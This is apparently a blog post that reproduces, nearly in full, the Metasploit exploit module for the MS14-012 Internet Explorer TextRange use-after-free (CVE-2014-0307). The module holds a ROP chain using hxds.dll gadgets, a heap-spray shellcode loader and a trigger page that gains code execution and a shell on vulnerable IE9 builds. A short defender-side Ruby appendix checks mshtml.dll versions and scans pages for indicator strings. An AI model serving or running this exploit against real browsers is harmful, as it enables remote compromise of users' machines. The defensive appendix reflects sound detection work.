Latest IE vulnerability of 2014: ms14_012

Category: Vulnerability Era
Summary

Once again, it is an MSF module (the MS14-012 / CVE-2014-0307 Internet Explorer TextRange use-after-free module from the Metasploit Framework):

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS14-012 Internet Explorer TextRange Use-After-Free",
      'Description'    => %q{
        This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
        was most likely introduced back in 2013, therefore only certain builds of MSHTML are
        affected. In our testing with IE9, these vulnerable builds appear to be between
        9.0.8112.16496 and 9.0.8112.16533, which implies August 2013 until early March 2014
        (before the patch).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jason Kratzer', # Original discovery
          'sinn3r'         # Port
        ],
      'References'     =>
        [
          [ 'CVE', '2014-0307' ],
          [ 'MSB', 'MS14-012' ]
        ],
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script/i,
          :os_name => OperatingSystems::WINDOWS,
          :ua_name => HttpClients::IE,
          :office  => "2010"
          #:ua_ver => '9.0' # Some fingerprinting issue w/ os_detect, disabled for now
        },
      'Targets'        =>
        [
          [
            'Automatic',
            {
              # mov eax,dword ptr [edx+0C4h]; call eax
              'Pivot' => 0x0c0d1020 # ECX
            }
          ]
        ],
      'Payload'        =>
        {
          'BadChars'       => "\x00",
          'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500
        },
      'DefaultOptions' =>
        {
          'Retries'              => false, # You're too kind, tab recovery, I only need 1 shell.
          'InitialAutoRunScript' => 'migrate -f'
        },
      'DisclosureDate' => "Mar 11 2014", # Vuln was found in 2013. Mar 11 = Patch tuesday
      'DefaultTarget'  => 0))
  end

  # hxds.dll
  def get_payload
    setup =
      [
        0x51C3B376, # rop nop
        0x51C2046E, # pop edi; ret
        0x51BE4A41, # xchg eax, esp; ret
      ].pack("V*")

    # rop nops
    45.times { setup << [0x51C3B376].pack('V*') }

    setup << [
      0x51C2046E, # pop edi ; ret
      0x51BD28D4  # mov eax, [ecx], call [eax+8]
    ].pack('V*')

    p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})

    Rex::Text.to_unescape(p)
  end

  def exploit_html
    template = %Q|<!DOCTYPE html>
<html>
<head>
<meta http-equiv='Cache-Control' content='no-cache'/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" >
<script>
<%=js_property_spray%>

sprayHeap({shellcode:unescape("<%=get_payload%>")});

function hxds() {
  try { location.href = 'ms-help:'; } catch(e) {}
}

function strike() {
  hxds();

  var fake = "";
  for (var i = 0; i < 12; i++) {
    if (i==0) {
      fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>");
    } else {
      fake += "\\u4141\\u4141";
    }
  }

  var elements = [
    'FOOTER', 'VIDEO', 'HTML', 'DIV', 'WBR', 'THEAD', 'PARAM', 'SECTION', 'IMG',
    'TIME', 'ASISE', 'CANVAS', 'P', 'RT', 'FRAMESET', 'TRACK', 'CAPTION'
  ];

  for (var i = 0; i < elements.length; i++) {
    var element = document.createElement(elements[i]);
    document.body.appendChild(element);
  }

  var tRange = document.body.createTextRange();
  tRange.moveToElementText(document.body.children[16]);
  tRange.execCommand('InsertInputSubmit', true, null);
  tRange.moveToElementText(document.body.children[0]);
  tRange.moveEnd('character',4);
  tRange.execCommand('InsertOrderedList', true, null);
  tRange.select();
  tRange.moveToElementText(document.body.children[0]);
  tRange.moveEnd('character',13);
  tRange.execCommand('Underline', true, null);
  tRange.execCommand('RemoveFormat', true, null);

  var fillObject = document.createElement('button');
  fillObject.className = fake;
}
</script>
</head>
<body onload='strike();'></body>
</html>
|

    return template, binding()
  end

  def on_request_exploit(cli, request, target_info)
    send_exploit_html(cli, exploit_html)
  end

end
```
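The module's description names the IE9 MSHTML builds its authors found affected (9.0.8112.16496 through 9.0.8112.16533), and its exploit page combines an `ms-help:` redirect (to get hxds.dll loaded) with a TextRange/execCommand sequence. The following Ruby is an added defender-side example, not part of the Metasploit module or the original post: it checks whether a four-part mshtml.dll version string falls inside that stated range, and it scans page text for the co-occurrence of those indicators as a triage signal. The function names, constants and sample inputs are constructed for this illustration.

```ruby
# Added example (not from the Metasploit module above): a version-range
# check built from the affected IE9 builds the module's description
# names, plus a simple indicator scan over page text. All names and
# sample values below are constructed for illustration.

# Bounds as stated in the module description, inclusive at both ends.
VULN_LOW  = [9, 0, 8112, 16496].freeze
VULN_HIGH = [9, 0, 8112, 16533].freeze

# Parse "a.b.c.d" into an array of integers. A malformed string raises
# rather than silently comparing as "not affected".
def parse_build(version)
  parts = version.to_s.strip.split('.')
  unless parts.size == 4 && parts.all? { |p| p =~ /\A\d+\z/ }
    raise ArgumentError, "expected four dotted integers, got #{version.inspect}"
  end
  parts.map(&:to_i)
end

# True when the mshtml.dll build lies inside the range the module reports
# as affected. Integer arrays compare element-wise with <=>, which gives
# the lexicographic order a build number needs (16533 > 16496, not "1".."9").
def vulnerable_mshtml_build?(version)
  build = parse_build(version)
  (build <=> VULN_LOW) >= 0 && (build <=> VULN_HIGH) <= 0
end

# Indicators taken from the exploit HTML shown on this page. Matching all
# three in one document is a triage signal for review, not proof of
# exploitation; legitimate pages may use TextRange and execCommand.
INDICATORS = ['ms-help:', 'createTextRange', 'execCommand'].freeze

# Return the subset of indicators present in the given page text.
def textrange_indicators(html)
  INDICATORS.select { |needle| html.include?(needle) }
end

def all_indicators_present?(html)
  textrange_indicators(html).size == INDICATORS.size
end

if __FILE__ == $0
  # Constructed sample versions straddling the stated range.
  %w[9.0.8112.16421 9.0.8112.16496 9.0.8112.16500 9.0.8112.16533 9.0.8112.16540].each do |v|
    state = vulnerable_mshtml_build?(v) ? 'inside affected range' : 'outside affected range'
    puts "#{v}: #{state}"
  end

  # Constructed sample page text carrying all three indicators.
  sample = "<script>location.href='ms-help:';" \
           "var r=document.body.createTextRange();" \
           "r.execCommand('Underline',true,null);</script>"
  puts "indicators found: #{textrange_indicators(sample).join(', ')}"
end
```

On a host you administer, the version to feed `vulnerable_mshtml_build?` is the file version of mshtml.dll; the range is the one the module's authors observed in their own IE9 testing, so treat a build outside it as "not covered by this note" rather than as confirmed safe, and rely on the MS14-012 update state for the real answer.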
